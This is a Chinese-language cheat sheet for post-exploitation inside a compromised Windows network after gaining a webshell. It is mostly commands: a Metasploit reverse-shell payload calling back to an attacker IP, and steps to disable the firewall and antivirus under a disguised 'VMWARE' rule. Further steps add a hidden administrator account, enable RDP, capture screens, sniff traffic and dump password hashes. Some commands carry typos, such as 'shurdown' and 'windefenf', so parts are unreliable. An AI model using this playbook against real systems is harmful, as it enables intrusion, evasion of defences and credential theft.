目录
内网渗透:在拿到websehll的时候,想办法获得系统信息拿到系统权限,进入到网络系统内部之后收集内部网络的各种信息,获取内部网络有价值的人员、资产信息。
内网信息收集常见的思路:
1.系统管理员密码
2.其他用户的session、3389和ipc连接记录、用户回收站信息收集
3.浏览器密码和cookies的获取,ie,chrome,firefox等
4.windows无线密码获取、数据库密码获取
5.host文件获取、dns缓存信息收集
6.进程、补丁、网络代理、软件列表等信息
7.VPN历史密码、teamview密码、启动项、iislog等
8.常见后渗透信息收集工具
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.20.128 LPORT=3333 -f exe > shell.exe
将payload发送到目标机器让其执行
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.20.128
set lport 4444
exploit
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off
netsh advfirewall show allprofiles
通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效:
shurdown -r -f -t 0
关闭windefenf
net stop windefenf
关闭杀毒软件
run killav
run post/windows/manage/killav
开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e
可以利用该命令在目标机器上添加用户:
run getgui -u admin -p admin
net localgroup administrators admin /add
远程连接桌面
rdesktop -u username -p password ip
查看远程桌面
screenshot
use espia
screengrab
screenshare
删除指定账号
run post/windows/manage/delete_user USERNAME=admin
抓包
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
use post/windows/gather/hashdump //system权限的meterpreter
set session 1
exploit //结果保存在tmp目录下
use post/windows/gather/smart_hashdump
set session 1
exploit
格式
用户名称:RID:LM-HASH值:NT-HASH值
rid是windows系统账户对应固定的值,类似于linux的uid,gid号,500为administartor,501为guest等。而lm-hash和nt-hash,他们都是对用户密码进行的加密,只不过加密方式不同